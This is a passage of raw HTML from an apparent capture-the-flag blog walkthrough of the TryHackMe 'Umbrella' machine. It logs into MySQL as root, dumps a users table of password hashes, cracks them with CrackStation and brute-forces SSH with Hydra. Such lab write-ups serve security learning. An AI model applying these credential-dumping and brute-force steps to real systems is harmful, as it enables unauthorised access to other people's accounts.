data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/db-creds\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/db-creds.png?fit=717%2C331&amp;ssl=1\" data-orig-size=\"717,331\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"db-creds\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/db-creds.png?fit=717%2C331&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/db-creds.png?resize=717%2C331&#038;ssl=1\" alt=\"\" class=\"wp-image-126\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/db-creds.png?w=717&amp;ssl=1 717w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/db-creds.png?resize=300%2C138&amp;ssl=1 300w\" sizes=\"auto, (max-width: 717px) 100vw, 717px\" \/><\/figure>\n\n\n\n<div style=\"height:34px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Using these credentials, we can connect to MySQL on the machine.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" 
width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Umbrella]\n\u2514\u2500$ mysql -u root -h 10.10.166.146 -p  \nEnter password: \nWelcome to the MariaDB monitor.  Commands end with ; or \\g.\nYour MySQL connection id is 5\nServer version: 5.7.40 MySQL Community Server (GPL)\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.\n\nMySQL [(none)]&gt; \" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: 
#BABED8\">~\/THM\/Linux-Boxes\/Umbrella<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mysql<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-u<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">root<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-h<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.166.146<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p<\/span><span style=\"color: #BABED8\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Enter<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">password:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Welcome<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">the<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MariaDB<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">monitor.<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Commands<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">end<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">with<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">or<\/span><span style=\"color: #BABED8\"> \\g<\/span><span style=\"color: #C3E88D\">.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Your<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">MySQL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">connection<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">id<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">5<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Server<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">version:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">5.7<\/span><span style=\"color: #C3E88D\">.40<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MySQL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Community<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Server<\/span><span style=\"color: #BABED8\"> (GPL)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Copyright<\/span><span style=\"color: #BABED8\"> (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Type<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">help;<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">or<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">\\h<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">help.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Type<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">\\c<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">clear<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">the<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">current<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">input<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">statement.<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">MySQL<\/span><span style=\"color: #BABED8\"> [(none)]<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> <\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Enumerating the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><strong><em>timetracking <\/em><\/strong><\/mark>database, we see there is a users table that usually contains usernames and passwords for users who can log in to web portals.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle 
cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"MySQL [(none)]&gt; show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| information_schema |\n| mysql              |\n| performance_schema |\n| sys                |\n| timetracking       |\n+--------------------+\n5 rows in set (0.206 sec)\n\nMySQL [(none)]&gt; use timetracking;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMySQL [timetracking]&gt; show tables;\n+------------------------+\n| Tables_in_timetracking |\n+------------------------+\n| users                  |\n+------------------------+\n1 row in set (0.200 sec)\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">MySQL<\/span><span style=\"color: #BABED8\"> [(none)]<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> show databases<\/span><span style=\"color: 
#89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+--------------------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Database<\/span><span style=\"color: #BABED8\">           <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+--------------------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">information_schema<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">mysql<\/span><span style=\"color: #BABED8\">              <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">performance_schema<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">sys<\/span><span style=\"color: #BABED8\">                <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">timetracking<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+--------------------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">5<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">rows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">set<\/span><span style=\"color: #BABED8\"> (0.206 <\/span><span style=\"color: #C3E88D\">sec<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">MySQL<\/span><span style=\"color: #BABED8\"> [(none)]<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> use timetracking<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Reading<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">table<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">information<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">completion<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">of<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">table<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">and<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">column<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">names<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">You<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">can<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">turn<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">off<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">this<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">feature<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">get<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">a<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">quicker<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">startup<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">with<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-A<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Database<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">changed<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">MySQL<\/span><span style=\"color: #BABED8\"> [timetracking]<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> show tables<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+------------------------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Tables_in_timetracking<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+------------------------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">users<\/span><span style=\"color: #BABED8\">                  <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+------------------------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">row<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">set<\/span><span style=\"color: #BABED8\"> (0.200 <\/span><span style=\"color: #C3E88D\">sec<\/span><span style=\"color: #BABED8\">)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:40px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Let&#8217;s dump the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><strong><em>users <\/em><\/strong><\/mark>table to find credentials.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">MySQL<\/span><span style=\"color: #BABED8\"> [timetracking]<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF; font-style: italic\">select<\/span><span style=\"color: #BABED8\"> * from users<\/span><span style=\"color: #89DDFF\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+----------+----------------------------------+-------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">user<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">pass<\/span><span style=\"color: #BABED8\">                             <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">time<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#FFCB6B\">+----------+----------------------------------+-------+<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">claire-r<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">2ac9cb7dc02b3c0083eb70898e549b63<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">360<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">chris-r<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">0d107d09f5bbe40cade3de5c71e9e9b7<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">420<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">jill-v<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">d5c0607301ad5d5c1528962a83992ac8<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">564<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#FFCB6B\">barry-b<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">4a04890400b5d7bac101baace5d7e994<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">47893<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">+----------+----------------------------------+-------+<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:29px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>After getting hashes, let\u2019s crack them (Use CrackStation) and add them to a password.txt file. We will also create a users.txt file with all the usernames we found in the database.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:36px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Using <a href=\"https:\/\/crackstation.net\/\" target=\"_blank\" rel=\"noopener noreferrer nofollow\" title=\"CrackStation\">CrackStation<\/a>, we can get the passwords for all the hashes. 
We can create a users.txt file with all the users found in the database and a pass.txt file with the passwords.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">SSH Brute-Force<\/mark> <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">(Foothold)<\/mark><\/h3>\n\n\n\n<p>Using Hydra, we can brute force SSH and see if any of the user credentials are valid for connecting to SSH.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"258\" data-attachment-id=\"129\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/ssh-brute\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssh-brute.png?fit=1394%2C351&amp;ssl=1\" data-orig-size=\"1394,351\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"ssh-brute\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssh-brute.png?fit=1024%2C258&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssh-brute.png?resize=1024%2C258&#038;ssl=1\" alt=\"\" class=\"wp-image-129\" style=\"width:901px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssh-brute.png?resize=1024%2C258&amp;ssl=1 1024w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssh-brute.png?resize=300%2C76&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssh-brute.png?resize=768%2C193&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssh-brute.png?w=1394&amp;ssl=1 1394w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:45px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>We will get our users.txt flag from claire-r\u2019s home directory<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Privilege Escalation<\/mark><\/h2>\n\n\n\n<p><em>I tried the following steps, but they did not reveal anything useful:<\/em><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Checking SUDO permissions (User is not in the sudoers group)<\/li>\n\n\n\n<li>No SUID binaries<\/li>\n\n\n\n<li>Did not find any interesting files that could help in privilege or lateral escalation<\/li>\n\n\n\n<li>Running linpeas did not reveal anything useful<\/li>\n\n\n\n<li>PSPY did not show any cron jobs running that we can abuse to get root access<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Port 8080<\/mark><\/h3>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"565\" height=\"365\" data-attachment-id=\"134\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/image-1\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-1.png?fit=565%2C365&amp;ssl=1\" 
